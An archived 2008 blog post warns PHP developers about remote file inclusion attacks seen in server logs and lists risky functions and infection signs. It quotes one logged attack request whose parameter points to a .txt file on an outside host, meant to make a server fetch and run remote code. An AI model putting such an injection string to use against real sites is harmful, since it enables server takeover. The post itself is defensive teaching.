Injection Attacks - avoiding them in your PHP
Archive - Originally posted on "The Horse's Mouth" - 2008-08-31 23:54:42 - Graham Ellis"Please help me debug this virus." I'm paraphrasing something that was posted, a long while ago now, on a board I look after ... and I deleted the code pretty darned fast, as I didn't (and still don't) want to form a source of information for the less scrupulous.
I was looking at a few issues on one of our servers earlier today, and found myself looking through page after page of attempted injection attacks, where a rogue visitor to the web site (almost inevitable an automated program) supplies a parameter that's the URL from another site, in the hope that my PHP script will read that other page and run the code therein on my server ... here's an example of the sort of thing (and this one's quite well known, and I have obfuscated it anyway, so I am giving few secrets away)
/phphtml.php?htmlclass_path=http://titureddo.changeview.org/vacanze/vini.txt?
Now ... this issue turned out to be a side shoot of what I was hunting down, but it acts as a timely reminder to be very careful indeed about using PHP's require, include, passthru, exec, system (and that may not be an exhaustive list either) on anything that could remotely be a variable derived from a user input via $_REQUEST and friends.
What's the risk? It's an injection attack (yes, I have the code. No - I am not reproducing it here!) and if it succeeds in finding a hole in your system, chances are (and experiences I have heard of confirm) that it will install itself on your server which will then form a part of the breeding colony ...
How many hack attempts like this are we getting? I estimate it's now thousands per day.
How do I know if I'm infected Well ... if you search your web pages for kangkung or RoxTeam and find something that you didn't know was there ...
Please note that this is just an example of one form of injection attack - this article is not intended to provide a complete of definitive list in any shape or form!